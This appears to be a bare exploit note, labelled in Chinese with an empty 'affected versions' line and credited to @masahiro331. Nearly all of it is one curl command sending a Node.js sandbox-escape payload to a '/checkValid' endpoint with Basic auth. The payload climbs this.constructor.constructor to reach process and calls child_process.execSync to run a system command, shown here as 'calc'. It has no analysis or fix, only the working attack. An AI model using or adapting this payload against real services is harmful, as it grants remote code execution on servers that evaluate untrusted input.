影响版本:
exp:
curl 'http://vulhost:8080/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw==' --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("calc")'
@masahiro331